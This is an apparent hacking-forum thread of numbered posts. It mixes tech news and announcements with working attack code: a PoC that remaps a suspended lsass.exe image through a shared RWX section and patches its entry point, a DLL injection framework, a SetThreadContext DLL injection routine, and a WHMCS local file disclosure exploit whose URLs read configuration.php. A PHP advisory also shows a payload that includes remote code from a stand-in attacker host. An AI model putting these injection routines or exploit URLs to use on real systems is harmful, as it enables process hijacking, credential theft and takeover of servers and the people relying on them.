    if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x2000, &nb_read) || nb_read != 0x2000)
    {
        printf("[-] ReadProcessMemory failed\n");
        return -1;
    }
    printf("(dbg) Two first bytes : %c%c\n", read_proc[0], read_proc[1]);
    eip = get_entrypoint(read_proc);
    if (eip >= 0x2000)
    {
        printf("[-] Entry point lies outside the copied 0x2000 bytes\n");
        return -1;
    }

    /* A pagefile-backed RWX section that will replace the target's image. */
    a.HighPart = 0;
    a.LowPart = 0x8EF2;
    if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
    {
        printf("[-] ZwCreateSection failed\n");
        printf("[-] NTSTATUS = %x\n", stat);
        return -1;
    }

    /* Map the section into our own process at the target's ImageBase. */
    size = 0x8000;
    BaseAddress = (PVOID)ImageBase;
    if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, 0, 0, NULL, &size, 1 /* ViewShare */, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
    {
        printf("[-] ZwMapViewOfSection failed\n");
        printf("[-] NTSTATUS = %x\n", stat);
        return -1;
    }

    /* Unmap the real lsass.exe image in the target first, otherwise the next call
       fails with STATUS_CONFLICTING_ADDRESSES; then map the same section there. */
    ZwUnmapViewOfSection(pi.hProcess, BaseAddress);
    if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, 0, 0, NULL, &size, 1 /* ViewShare */, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
    {
        printf("[-] ZwMapViewOfSection failed\n");
        printf("[-] NTSTATUS = %x\n", stat);
        system("pause");
        return -1;
    }

    /* Both processes now see the same memory at ImageBase: put an int3 at the
       entry point of the copied image and write it through our own view. */
    printf("[+] No more STATUS_CONFLICTING_ADDRESSES, let's insert an int3\n");
    memset((BYTE *)read_proc + eip, 0xCC, 1);
    memcpy(BaseAddress, read_proc, 0x2000);

    ResumeThread(pi.hThread);
    system("pause");
    return 0;
}

And the include file, main.h:

#define UNICODE
#define _UNICODE
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

#if !defined NTSTATUS
typedef LONG NTSTATUS, *PNTSTATUS;
#endif
#define STATUS_SUCCESS 0
#if !defined PROCESSINFOCLASS
typedef LONG PROCESSINFOCLASS;
#endif
#if !defined PPEB
typedef struct _PEB *PPEB;
#endif
#if !defined PROCESS_BASIC_INFORMATION
typedef struct _PROCESS_BASIC_INFORMATION {
    PVOID     Reserved1;
    PPEB      PebBaseAddress;
    PVOID     Reserved2[2];
    ULONG_PTR UniqueProcessId;
    PVOID     Reserved3;
} PROCESS_BASIC_INFORMATION;
#endif

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

/* Function pointers filled in from ntdll at runtime (see main()). */
NTSTATUS (__stdcall *ZwQueryInformationProcess)(
    HANDLE ProcessHandle,
    PROCESSINFOCLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength,
    PULONG ReturnLength OPTIONAL);

NTSTATUS (__stdcall *ZwCreateSection)(
    PHANDLE SectionHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    PLARGE_INTEGER MaximumSize OPTIONAL,
    ULONG SectionPageProtection,
    ULONG AllocationAttributes,
    HANDLE FileHandle OPTIONAL);

NTSTATUS (__stdcall *ZwMapViewOfSection)(
    HANDLE SectionHandle,
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    SIZE_T CommitSize,
    PLARGE_INTEGER SectionOffset,
    PSIZE_T ViewSize,
    DWORD InheritDisposition,
    ULONG AllocationType,
    ULONG Win32Protect);

NTSTATUS (__stdcall *ZwUnmapViewOfSection)(
    HANDLE ProcessHandle,
    PVOID BaseAddress);

So for the PoC I just put an INT3 at the entry point of lsass.exe, and here is the result:

Conclusion

This method is really fun because it doesn't use SetThreadContext() to update EIP before resuming thread execution.

Source: http://blog.w4kfu.com/post/new_method_of_injection

IMPORTANT: In the original post I had to write ZwUnmapViewOfSection as ZwUn_mapViewOfSection (the forum would not let me post it otherwise, thanks Zatarra). See the source.
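The whole trick rests on section semantics: one section object mapped into two processes at the same address is the same physical memory, so writing through the injector's own view patches the target without any cross-process write call, and the only obstacle is that the target's image already occupies that address. The PoC above only builds on Windows, so here is a POSIX analog, added for this page and not part of w4kfu's post, that reproduces each step on Linux: a file-backed MAP_SHARED mapping stands in for the ZwCreateSection section, MAP_FIXED_NOREPLACE produces the EEXIST error that plays the role of STATUS_CONFLICTING_ADDRESSES, munmap() plays ZwUnmapViewOfSection(), and a forked child, which inherits the shared view, stands in for the suspended lsass.exe. The 0xCC payload is the PoC's int3 patch. Everything is constructed; no real process is touched.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef MAP_FIXED_NOREPLACE
#define MAP_FIXED_NOREPLACE 0x100000   /* Linux >= 4.17; older kernels ignore it and treat addr as a hint */
#endif

#define VIEW_SIZE 4096

/* Constructed payload: the int3 bytes the PoC writes over the entry point. */
static const unsigned char PAYLOAD[4] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Map the section `fd` at exactly `addr` without replacing what is mapped there.
   0 on success; -1 with errno == EEXIST when the address is occupied, the POSIX
   counterpart of STATUS_CONFLICTING_ADDRESSES. */
static int map_view_at(int fd, void *addr)
{
    void *v = mmap(addr, VIEW_SIZE, PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_FIXED_NOREPLACE, fd, 0);
    if (v == MAP_FAILED)
        return -1;
    if (v != addr) {                 /* kernel without MAP_FIXED_NOREPLACE moved us elsewhere */
        munmap(v, VIEW_SIZE);
        errno = EEXIST;
        return -1;
    }
    return 0;
}

/* Runs the steps of the trick; returns 0 when each behaved as described, else -(step). */
int demo_shared_view(void)
{
    /* The "section object": an unlinked temp file of VIEW_SIZE bytes. */
    char tmpl[] = "/tmp/section-XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    unlink(tmpl);
    if (ftruncate(fd, VIEW_SIZE) != 0) return -1;

    /* The target's "image": something already lives at the base address. */
    void *base = mmap(NULL, VIEW_SIZE, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) return -2;

    /* Step 1: mapping the section over the live image is refused. */
    if (map_view_at(fd, base) == 0 || errno != EEXIST) return -3;

    /* Step 2: unmap the image first; now the view lands exactly at base. */
    if (munmap(base, VIEW_SIZE) != 0 || map_view_at(fd, base) != 0) return -4;

    /* Step 3: a second process holding the same view at the same address.
       fork() inherits MAP_SHARED views; the Windows PoC gets there by mapping
       the section through the suspended target's process handle. */
    int pipefd[2];
    if (pipe(pipefd) != 0) return -5;
    pid_t pid = fork();
    if (pid < 0) return -6;
    if (pid == 0) {
        char go;
        if (read(pipefd[0], &go, 1) != 1) _exit(2);        /* wait for the parent's write */
        _exit(memcmp(base, PAYLOAD, sizeof PAYLOAD) == 0 ? 0 : 1);
    }

    /* Step 4: write through our own view only; the child sees it without any
       WriteProcessMemory-style call. */
    memcpy(base, PAYLOAD, sizeof PAYLOAD);
    if (write(pipefd[1], "x", 1) != 1) return -7;

    int status = 0;
    if (waitpid(pid, &status, 0) != pid) return -8;
    munmap(base, VIEW_SIZE);
    close(fd); close(pipefd[0]); close(pipefd[1]);
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -9;
}

int main(void)
{
    int rc = demo_shared_view();
    printf("%s (rc=%d)\n",
           rc == 0 ? "child observed the patch through the shared view" : "a step failed", rc);
    return rc != 0;
}
```

The defender's view is the same on both platforms: after the swap, the region at the image base is backed by an anonymous or pagefile section rather than by the executable on disk, which is the discrepancy memory-forensics tools look for when flagging hollowed processes, and it is there whether or not SetThreadContext() was ever called.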
  8. Download Firefox 8 Final for Linux
November 6th, 2011, 09:50 GMT - By Marius Nestor

Dear readers, a few minutes ago Mozilla unleashed the stable version of the highly anticipated Mozilla Firefox 8.0 web browser for Linux, Windows and Macintosh operating systems. Yes, we're talking about the final version of Firefox 8, which is already available for download on the official FTP site of the Mozilla company.

Mozilla Firefox 8.0 brings new features, as well as performance and stability enhancements. Here are some of the most important ones:
- Implemented Twitter search;
- Tabs can now be loaded on demand, greatly improving start-up time;
- Implemented a one-time add-on selection dialog to easily manage your installed extensions;
- HTML5 context menus support;
- Better memory performance;
- Third party add-ons are now disabled by default;
- insertAdjacentHTML support;
- Better CSS hyphen support;
- Better WebSocket support;
- CORS support.

Mozilla Firefox 8.0 is supported on both 32-bit and 64-bit architectures, which means that it will run on any Linux distribution. Canonical will also update their supported Ubuntu releases to Firefox 8 via the official channels; just update your systems in a few days. Until then, download the Mozilla Firefox 8 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons!

Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-4-20864.shtml
Version 9.0a2 Aurora: http://www.mozilla.org/en-US/firefox/aurora/
Source: http://news.softpedia.com/news/Download-Firefox-8-Final-for-Linux-232587.shtml

  9. VanishCrypt – Virtual Encryption Tool by SecurityLabs

SecurityLabs experts from India have released a new virtual encryption tool called "VanishCrypt", a freeware utility to secure your data. It creates a virtual disk that contains your secret files. Data is protected with an encrypted password. The files are completely inaccessible without the correct password. Stored files are encrypted with the strong CryptoAPI.

Additional features: it has an "Advanced Mode" with which you can create a real virtual drive, accessible in Explorer, that contains your files stored in the vdisk image. It uses the Win32 API for I/O operations, for great speed improvements.

Video: http://www.youtube.com/watch?feature=player_embedded&v=Kj0TSkYrI0g#!
Download: http://code.google.com/p/vanishcrypt/downloads/detail?name=Vanish%20Crypt.rar&can=2&q=#makechanges
Via: http://www.securitylabs.in/2011/11/vanishcrypt-virtual-encryption-tool.html
Source: http://thehackernews.com/2011/11/vanishcrypt-virtual-encryption-tool-by.html
  10. Social Engineering Capture the Flag Results
defcon@social-engineer.org
Written by: Christopher J. Hadnagy & James O'Gorman
Researchers: Dan Sharp & Eric Maxwell

Table of Contents
Executive Summary
Primary Findings
Background and History of CTF Event
Flags
Results and Analysis
Companies Called
Target Ranking
Dossiers
Information Sources
Calls
Targeted Employees
Pretexts Used
Defenses
Industries Targeted
Corporate Security Spending
Conclusion and Recommendations
About Social-Engineer.org & Social-Engineer.Com
Sponsors

Download: http://www.social-engineer.com/downloads/Social-Engineer_Defcon_19_SECTF_Results_Report.pdf
  11. Japanese supercomputer blisters 10 quadrillion calculations per second

By Layer 8 on Fri, 11/04/11 - 12:54pm.

"K" supercomputer builds on Top 500 fastest supercomputer rankings lead

The Japanese supercomputer ranked #1 on the Top 500 fastest supercomputers broke its own record this week by hitting 10 quadrillion calculations per second (10.51 petaflops), according to its operators, Fujitsu and Riken.

The supercomputer "K" consists of 864 racks, comprising a total of 88,128 interconnected CPUs, and has a theoretical calculation speed of 11.28 petaflops, the companies said. When the LINPACK benchmark program measured the K computer in its final configuration, the supercomputer system achieved a speed of 10.51 petaflops, exceeding its previous speed of 8.162 petaflops, which had placed the system in first place on the TOP500 supercomputer list published June 2011, the companies said.

So what kind of applications is such a monster machine good for? Fujitsu and Riken listed the following:
- Analyzing the behavior of nanomaterials through simulations and contributing to the early development of such next-generation semiconductor materials, particularly nanowires and carbon nanotubes, that are expected to lead to future fast-response, low-power devices.
- Predicting which compounds, from among a massive number of drug candidate molecules, will prevent illnesses by binding with active regions on the proteins that cause illnesses, as a way to reduce drug development times and costs (pharmaceutical applications).
- Simulating the actions of atoms and electrons in dye-sensitized solar cells to contribute to the development of solar cells with higher energy-conversion efficiency.
- Simulating seismic wave propagation, strong motion, and tsunamis to predict the effects they will have on human-made structures; predicting the extent of earthquake-impact zones for disaster prevention purposes; and contributing to the design of quake-resistant structures.
- Conducting high-resolution (400-m) simulations of atmospheric circulation models to provide detailed predictions of weather phenomena that elucidate localized effects, such as cloudbursts.

Riken and Fujitsu have been developing the K computer as part of Japan's Ministry of Education, Culture, Sports, Science and Technology High-Performance Computing Infrastructure program.

Source: http://m.networkworld.com/community/blog/japanese-supercomputer-blisters-10-quadrillio

Am I the only one who thinks its best use would be cracking MD5 hashes?
  12. DLL Injection Framework

Update: I've left this up for posterity, but unless you have a good reason not to, you should be using Microsoft Detours for this stuff. It's just as easy to use and far more mature.

Code injection is messy. Hooking via JMP patching is even messier. So I've tried to clean things up as much as possible by putting the heavy lifting in a C++ class. You can get a rough idea of the exposed functionality from the class's public function list:

    bool CallThreadProc(const char* thread_proc_name, void* parameter, DWORD timeout_ms, DWORD &exit_code);
    static DWORD GetProcessIDFromWindow(const char* class_name, const char* window_name);
    void* GetRemoteProcAddress(const char* proc_name);
    void* GetRemoteProcAddress(const char* proc_name, const char* module_path);
    HMODULE GetRemoteModuleHandle(HMODULE local_handle);
    HMODULE InjectDLL(DWORD process_id);
    HDLLHOOK InstallDLLHook(const char* existing_module_path, const char* existing_function_name, const char* hook_function_name);
    HDLLHOOK InstallCodeHook(void* existing_function_address, const char* hook_function_name);
    bool RemoveAllHooks();
    bool RemoveHook(HDLLHOOK handle);
    void RemoveDLL();

I provide no documentation beyond the brief descriptions given in the header and the following example. It should all be sufficiently self-explanatory though. This snippet injects a DLL into Windows Calculator, which is assumed to be running, then installs two hooks (one by name and another by address) from the user-supplied HookDLL.
    // Create the injection object
    DLLInjection injection("E:/Temp/HookDLL.dll");

    // Find Calc.exe by its window
    DWORD process_id = injection.GetProcessIDFromWindow("SciCalc", "Calculator");

    // Inject the DLL
    HMODULE remote_module = injection.InjectDLL(process_id);

    // Hook a DLL function (User32!SetWindowTextW)
    HDLLHOOK swtw_hook = injection.InstallDLLHook("C:/Windows/System32/User32.dll", "SetWindowTextW", "SetWindowTextHookW");

    // Hook a function manually (Calc!0100F3CF)
    HDLLHOOK manual_hook = injection.InstallCodeHook(reinterpret_cast<void*>(0x0100F3CF), "SomeOtherHook");

    // Remove the hooks
    injection.RemoveHook(swtw_hook);
    injection.RemoveHook(manual_hook);

Source: http://www.ring3circus.com/downloads/dll-injection-framework/
  13. SetThreadContext DLL Injection

by nerd | 2007/01/16 14:46

    #include <windows.h>
    #include <string.h>

    // Stub copied into the target process (32-bit MSVC inline asm); the
    // placeholder constants are patched in InjectDll() before it is written.
    void __declspec(naked) InjectFunction()
    {
        __asm
        {
            PUSHAD
            MOV EAX, 0xAAAAAAAA   //eventually the address of LoadLibraryA
            PUSH 0xBBBBBBBB       //eventually the module name
            CALL EAX
            POPAD
            //vc is pissy and requires us to emit the hardcoded jump
            __emit 0xE9
            __emit 0xCC
            __emit 0xCC
            __emit 0xCC
            __emit 0xCC
        }
    }

    // Empty marker: its address minus InjectFunction's address gives the stub size
    void __declspec(naked) AfterFunction()
    {
    }

    void InjectDll( HANDLE hProc, HANDLE hThread, char *DllName )
    {
        //hold up
        SuspendThread( hThread );

        //get the thread context
        CONTEXT ThreadContext;
        ThreadContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext( hThread, &ThreadContext );

        //copy the function to a tmp buffer
        ULONG FunctionSize = (PBYTE)AfterFunction - (PBYTE)InjectFunction;
        PBYTE LocalFunction = new BYTE[FunctionSize];
        memcpy( LocalFunction, InjectFunction, FunctionSize );

        //allocate a remote buffer
        PBYTE InjData = (PBYTE)VirtualAllocEx( hProc, NULL, FunctionSize + strlen(DllName)+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

        //fixup the tmp buff
        for( ULONG i = 0; i < FunctionSize-3; i++ )
        {
            if ( *(PULONG)&LocalFunction[i] == 0xAAAAAAAA )
            {
                *(PULONG)&LocalFunction[i] = (ULONG)GetProcAddress( GetModuleHandleA( "kernel32.dll" ), "LoadLibraryA" );
            }
            if ( *(PULONG)&LocalFunction[i] == 0xBBBBBBBB )
            {
                *(PULONG)&LocalFunction[i] = (ULONG)InjData + FunctionSize;
            }
            if ( *(PULONG)&LocalFunction[i] == 0xCCCCCCCC )
            {
                //JMP displacement back to the original EIP, relative to the end of the 5-byte JMP
                *(PULONG)&LocalFunction[i] = ThreadContext.Eip - ((ULONG)&InjData[i] + 4);
            }
        }

        //write the tmp buff + dll
        //Format: [RemoteFunction][DllName][null char]
        SIZE_T dwWritten;
        WriteProcessMemory( hProc, InjData, LocalFunction, FunctionSize, &dwWritten );
        WriteProcessMemory( hProc, InjData + FunctionSize, DllName, strlen(DllName)+1, &dwWritten );
        delete[] LocalFunction;

        //set the EIP
        ThreadContext.Eip = (ULONG)InjData;
        SetThreadContext( hThread, &ThreadContext );

        //resume the thread
        ResumeThread( hThread );
    }

Source: http://nerd.egloos.com/2940083
  14. How Structs Really Work in C

Posted by paul, 16 October 2011

You don't know it yet, but you're...wrong. I'm not even going to bother asking the question. Wouldn't be any point, other than to embarrass you and make me look douchey...and I look douchey enough as it is. So let's just drop it -- Wait, you still want to hear the question? Seriously? Well fine. Since you're so smart, riddle me this: what's the purpose of a struct in C?

Oh, what's that you say? The purpose of a struct is blah de blah blah container blah fields blah data type blah de blah blah blah blah? Yeah, guess what? You're wrong.

You want to know the true purpose of a struct in C? The purpose of a struct is to confuse the hell out of programmers who've forgotten, or never learned in the first place, that in C, memory is king. How is memory king? Well, let us see...

1) In C, a struct maps to memory

Let's say you want to do something with a video file. In memory, the file looks like this: it uses two bytes for the header, one byte for the video type, four bytes for the size, and 1024 bytes for the video data. Pretty easy to see how this will map to a struct, right?

    struct video_file{
        short header;
        char type;
        int size;
        char data[1024];
    };

You use memcpy() or a direct pointer assignment to get access to it:

    struct video_file v;
    memcpy(&v, video_loc_in_memory, sizeof(struct video_file));
    size = v.size; /* or whatever */

    ...

    struct video_file * p = video_loc_in_memory;
    size = p->size; /* or whatever */

Not too bad, right? Well, here's the problem: if padding bytes are involved, you could be entering a world of pain and not even know it. Many compilers insert padding bytes into the struct to ensure the fields are aligned. What's worse, they often do this by default.
If that happens, you could end up with a struct that, internally, looks like this:

    struct video_file{
        char padding; /*what?!?!*/
        short header;
        char type;
        char padding; /*what?!?!*/
        int size;
        char data[1024];
    };

So instead of 1031 bytes, you've got a struct that's 1033 bytes long. Surprise! Try doing a memcpy() now and see what happens! The solution is to use a compiler switch or a #pragma pack to ensure that structs are packed (i.e., no padding applied).

2) In C, structs are allowed to "run off the end"

In reality, video files aren't statically sized (and they contain a hell of a lot more data than 1024 bytes!). So let's rewrite our struct in a way that's guaranteed to give a newb his or her daily dose of WTF:

    struct video_file2{
        short header;
        char type;
        int size;
        char data[0];
    };

A zero length array? Well, just remember: memory is king. As long as a symbol is backed by real memory, you can do what you want with it -- including running it past its boundaries (you will never see an OutOfBounds exception in C!)

Example: this video uses two bytes for the header, one byte for the video type, four bytes for the size, and n bytes for the video data. This technique requires a struct pointer:

    struct video_file2 * p = video_loc_in_memory;
    for(int i=0; i<p->size; i++)
        p->data[i] = (char)(p->data[i] * 0.5); /* apply filter, maybe */

Note: some compilers don't allow zero-length arrays. In that case, you can use a 1-element array. Same principle applies: just overrun the end of it to suit your needs.

3) In C, you can compute an offset within a struct by committing an offense against aesthetics so grave it makes the cast of Jersey Shore look positively Frasierish in comparison.

    struct s{
        short x;
        char y;
        char z[100];
        short thing;
    };

You need to get the offset of thing inside of s. What's the conventional way to go about this?
Well, duh, like this:

    size_t offset = (size_t) &(((struct s*)0)->thing);

In the immortal words of Arnold, "That's one...ugly...mudder...fu--"

Yes, it's pretty gross, but remember, in C, memory is king. Pretend you've got a struct s at memory location zero. If you map it out, it looks like this: because the struct is based at zero, the address of thing is its offset! In this case, 103 bytes.

Except there's one problem, isn't there? How in the world are you supposed to dereference memory address zero? That's, like, a memory access violation waiting to happen! Well, actually...that's a trick question. Nothing gets dereferenced!

- (struct s*)0 casts zero to a struct s pointer. No dereferencing occurs.
- ((struct s*)0)->thing informs the compiler that you will be doing something with thing, but nothing happens with it at that point. No dereferencing occurs.
- &(((struct s*)0)->thing) computes the address of thing using pointer arithmetic. It doesn't actually touch the memory, so no dereferencing occurs.

Note: officially, you're supposed to use the offsetof() macro to do this, but if you ever do any real C programming (i.e., embedded) you'll see this in other people's code, so you might as well get comfortable with how it works.

Conclusion: Well, that was a brief rundown of how C structs interact with memory and vice-versa. I hope you found it useful, and if you have any questions, feel free to leave them in the comments.

Source: How Structs Really Work in C | TENACIOUS C
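As an added example (not from the article): the video_file header laid out with default alignment and packed, the null-pointer offset trick beside offsetof(), and the bounds check the article's filter loop is missing before it trusts p->size. The sample bytes and the names video_file_packed, video_hdr, make_sample and parse_video are constructed for this example; a little-endian host is assumed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The article's layout with default alignment: the compiler pads before `size`. */
struct video_file {
    short header;
    char  type;
    int   size;
    char  data[1024];
};

/* The same fields packed: matches the 1031-byte on-disk format byte for byte. */
#pragma pack(push, 1)
struct video_file_packed {
    short header;
    char  type;
    int   size;
    char  data[1024];
};

/* Header-only view with a C99 flexible array member (the "char data[0]" trick). */
struct video_hdr {
    short header;
    char  type;
    int   size;
    char  data[];
};
#pragma pack(pop)

/* Offset of `size` via the null-pointer trick and via the standard macro. */
size_t size_offset_trick(void) { return (size_t)&(((struct video_file *)0)->size); }
size_t size_offset_macro(void) { return offsetof(struct video_file, size); }

/* Constructed sample (little-endian): header 0x1234, type 1, size 3, data "abc".
 * Copies it into `out` and returns its length, or 0 if `out` is too small. */
size_t make_sample(unsigned char *out, size_t cap) {
    static const unsigned char sample[] = {
        0x34, 0x12,             /* header */
        0x01,                   /* type   */
        0x03, 0x00, 0x00, 0x00, /* size   */
        'a', 'b', 'c'           /* data   */
    };
    if (cap < sizeof sample) return 0;
    memcpy(out, sample, sizeof sample);
    return sizeof sample;
}

/* memcpy() into the padded struct: `size` is read from the wrong bytes. */
int size_via_padded(const unsigned char *buf, size_t len) {
    struct video_file v;
    memset(&v, 0, sizeof v);
    memcpy(&v, buf, len < sizeof v ? len : sizeof v);
    return v.size;
}

/* memcpy() into the packed struct: `size` comes from bytes 3..6 as intended. */
int size_via_packed(const unsigned char *buf, size_t len) {
    struct video_file_packed v;
    memset(&v, 0, sizeof v);
    memcpy(&v, buf, len < sizeof v ? len : sizeof v);
    return v.size;
}

/* Validate a raw buffer before looping over data[0..size): returns the payload
 * length, or -1 when the header is truncated or `size` runs past `len`.
 * The article's filter loop trusts p->size as-is; with a hostile size it would
 * read and write past the end of the buffer, which this check rules out. */
long parse_video(const unsigned char *buf, size_t len) {
    struct video_hdr h;
    if (len < sizeof h) return -1;                                /* no full header */
    memcpy(&h, buf, sizeof h);
    if (h.size < 0 || (size_t)h.size > len - sizeof h) return -1; /* would overrun */
    return h.size;
}

int main(void) {
    unsigned char buf[16];
    size_t n = make_sample(buf, sizeof buf);
    printf("sizeof padded=%zu packed=%zu offset(size)=%zu/%zu\n",
           sizeof(struct video_file), sizeof(struct video_file_packed),
           size_offset_trick(), size_offset_macro());
    printf("size via padded=%d via packed=%d validated=%ld\n",
           size_via_padded(buf, n), size_via_packed(buf, n), parse_video(buf, n));
    buf[3] = 0x20;                       /* claim 32 data bytes in a 10-byte buffer */
    printf("oversized size -> %ld\n", parse_video(buf, n));
    return 0;
}
```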
  15. You have to read the security token from the page source (parse it) after logging in and use that one, not a fixed one set by you. That token changes on every login.
  16. Hack in Paris 2011 videos

- Cyberwar-4G aka The Coming Smart Phone Wars
- Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradication of XSS
- Be a smart CISO: learn about people
- "Project Quebec" and win32 exploit development with pvefindaddr
- Offensive XSLT
- Agnitio: the security code review Swiss army knife
- Pentesting iPhone & iPad Applications
- Skirack: ROP for masses
- The forbidden image - Security impact of SVG on the WWW
- A close look at rogue antivirus programs
- Proactive Network Security through Vulnerability Management
- Escaping Windows Sandboxes

Videos: http://www.hackinparis.com/archive-2011

Most of the titles sound very good; I hope you find them useful.
  17. A short administrative announcement: we have two new moderators.

Congratulations:
- wildchild
- Zatarra

PS: We have a few more ideas; it remains to be seen what further changes will come.
  18. We apply the Defcamp method: http://i40.tinypic.com/2464aco.png
  19. Pathetic.
  20. Network Security Tools For more than a decade, the Nmap Project has been cataloguing the network security community's favorite tools. In 2011 this site became much more dynamic, offering ratings, reviews, searching, sorting, and a new tool suggestion form. This site allows open source and commercial tools on any platform, except those tools that we maintain (such as the Nmap Security Scanner, Ncat network connector, and Nping packet manipulator). We're very impressed by the collective smarts of the security community and we highly recommend reading the whole list and investigating any tools you are unfamiliar with. Click any tool name for more details on that particular application, including the chance to read (and write) reviews. Many site elements are explained by tool tips if you hover your mouse over them. Enjoy! http://sectools.org/
  21. Treat this post as "this is how not to do it". To those who have such a mentality and such desires: if you don't have an account, avoid creating one, and if you already have one, try to keep quiet.
  22. WHMCS (clientarea.php) Local File Disclosure

    # Title     : WHMCS (clientarea.php) Local File Disclosure
    # Author    : Red Virus >>>c3o@w.cn
    # Product   : WHMCS ( WHMCompleteSolution )
    # Vendor    : http://whmcs.com/
    # Date      : 11/04/2011
    # Version   : 3.X.x
    # Tested on : linux+apache
    # Homepage  : www.alm3refh.com
    ================================================================
    http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
    http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00

    show the page source to see Disclosure file
    ================================================================
    Greetz To . >>> alm3refh.com - tryag.cc - joood
    T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group
    ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA

Source: WHMCS 3.x Local File Disclosure - Packet Storm
  23. Security bug in is_a function in PHP 5.3.7 / 5.3.8

Sep 23 2011

A few weeks ago we migrated a part of our hosting environment from PHP 5.3.6 to PHP 5.3.8. Normally an upgrade like this doesn't cause any problems, since the PHP minor releases only contain bug and security fixes. This time however, something big did change. The behaviour of the is_a function was radically altered, causing quite a few errors for clients using certain PHP/PEAR frameworks. We quickly reverted it, investigated the issue and discovered the source, and, alarmingly, it turned out that a big security hole had been introduced.

What was fixed?

PHP 5.3.7 included a fix for PHP bug #53727. This fix however changed the behavior of the is_a() function, a function normally used to check if a certain variable is a child of a specific class. The original behavior accepted all sorts of inputs as its primary argument, including strings. The old behavior was to see if this "string" was an instance of a specific class, which it obviously wasn't, and return false. The new behavior however attempts to be "helpful", and passes its first argument to the __autoload() function. And it is this exact change that caused such unexpected behavior for our customers.

The problem our customers were having is that they had some (custom) code that implemented a very basic autoloader, in an attempt to reduce memory footprints by automatically loading class definitions when they were needed using the __autoload() function. Their code however never expected to be given anything other than a class name, but now all of a sudden they were receiving all sorts of objects. Take for example the following code snippet using a standard PEAR File library:

    //autoload function from http://www.php.net/manual/en/language.oop5.autoload.php
    function __autoload($class_name) {
        include $class_name . '.php';
    }

    $uploaded_file = File::readAll($uploaded_filename);
    if (PEAR::isError($uploaded_file)) {
        print_error($uploaded_file);
    } else {
        process_upload($uploaded_file);
    }

Normally one wouldn't expect the __autoload() function to be called at all here, but the PEAR::File library uses the PEAR standards and uses the PEAR::isError() call internally to check if the file was read correctly or if an error was returned. This function ends up calling the is_a function, and this ends up calling the autoloader function, which is obviously poorly equipped to handle anything but explicit class names. As a result, even this standard piece of PHP code, using standard libraries and code snippets from the php.net site itself, suddenly has its behavior changed. Instead of simply sending the uploaded file to the process_upload() function, the __autoload() function now tries to include a file that doesn't exist and throws a giant error to the client.

The problem with the new behavior

Normally a BC-breaking bug isn't a huge deal. Sure, some people have some unexpected behavior, which is why the developers try to avoid breaking BC in a minor update. If any does happen, people file a bug and the behavior is fixed in the next update. The same happened to this bug: PHP bug #55475 was filed and a discussion was started about whether this bug should be fixed or if the change was intended behavior.

The biggest problem with this new behavior however, is not just the fact that errors are suddenly displayed. Of course this was a problem for the webmasters hosting at our servers, but the real problem lies even deeper than that... A lot of __autoload() implementations we found on our systems use the standard example from php.net to include their classes, which doesn't contain any sort of checks before trying to include a file. While one could argue that it's never a good idea to simply copy example code into a live environment, this does happen more often than not, according to our scans.
And it is exactly in this standard behavior that the problem lies. If we look again at the example above, it's easy to see what happens. A file, say a JPG file, is uploaded by the user and read from the disk. The script checks to see if it read the file correctly and in doing so passes the contents of the uploaded file to the __autoload() function, which tries to load the class. Now normally the server would print an error stating "Error: include(/var/www/domain.com/upload/.php) [function.include]: failed to open stream: No such file or directory (error #2)." and present this to the user.

Now what if the user doesn't upload an image file, but a carefully crafted text file with a JPEG extension? Imagine for example the following contents in the file:

    http://www.cracker.com/hack-me-include

Now we take that file and upload it to the website. The file is read by File::readAll(), its contents returned in $uploaded_file. We pass this variable to the PEAR::isError() function, it passes it to the __autoload() function, which blindly prepares the string to include:

    "http://www.cracker.com/hack-me-include" . ".php" => "http://www.cracker.com/hack-me-include.php"

A nice and complete URL. It feeds this to the include() function, which downloads the file with code from the remote website and, eventually, executes it. At this point, you can consider your website lost, as the hacker can execute whatever code he wants on your website. He has full access to your database configuration file, your settings, your database with customer information, and everything else. The only recourse you have at this point is to restore your entire website from a known and trusted backup and change all your passwords (both for your hosting environment, your website, and for all your customers whose information has been exposed to the hackers).

The fix

Luckily there are quite a few ways to fix it.
